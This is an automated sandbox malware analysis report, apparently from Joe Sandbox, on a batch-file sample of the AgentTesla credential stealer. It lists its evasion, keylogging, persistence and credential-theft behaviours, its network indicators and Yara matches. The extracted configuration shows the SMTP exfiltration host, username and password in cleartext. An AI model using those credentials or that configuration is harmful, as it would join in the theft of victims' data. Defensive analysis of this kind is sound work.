Windows Analysis Report
ilZhNx3JAc.bat

Overview

General Information

Sample name: ilZhNx3JAc.bat
renamed because original name is a hash value
Original sample name: 45a4bc99c532b7f256e58501fe36a809d3bcd530fe6543de7de77d0db7902c98.bat
Analysis ID: 1545586
MD5: 9884d4c89fcd9016a1af1f7ce48d4604
SHA1: 8e7a81d398a10f3c1a4783932f85613570fee73f
SHA256: 45a4bc99c532b7f256e58501fe36a809d3bcd530fe6543de7de77d0db7902c98
Tags: AgentTesla, bat, user-NDA0E

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Found large BAT file
Injects a PE file into a foreign processes
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

AV Detection

Source: 8.2.InstallUtil.exe.7a0000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9B679h 7_2_08A9B837
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9AF14h 7_2_08A9AEA0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9AF14h 7_2_08A9AEB0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9B679h 7_2_08A9B609
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9B679h 7_2_08A9B618
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_08AA8838
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_08AA8830
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08AA3C58h 7_2_08AA3BA0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08AA3C58h 7_2_08AA3B98
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08AA9FD7h 7_2_08AA9D78
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 7_2_08C7D598
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 16_2_0891D598

Networking

Source: Yara match File source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.7:49740 -> 163.44.198.71:587
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1
Source: Joe Sandbox View IP Address: 163.44.198.71
Source: Joe Sandbox View ASN Name: TUT-ASUS
Source: Joe Sandbox View ASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: nffplp.com
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: InstallUtil.exe, 00000008.00000002.1533228561.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MustFlush.bat.Dmf, 00000010.00000002.1583372523.0000000006D10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3804053354.0000000000C37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
Source: InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: InstallUtil.exe, 00000012.00000002.3802503434.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting-
Source: InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting1
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nffplp.com
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005709000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3804053354.0000000000C37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: MustFlush.bat.Dmf, 00000010.00000002.1583372523.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004651000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005709000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, POq2Ux.cs .Net Code: mDt2FXita0Y
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

System Summary

Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: ilZhNx3JAc.bat Static file information: 1411997
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process Stats: CPU usage > 49%
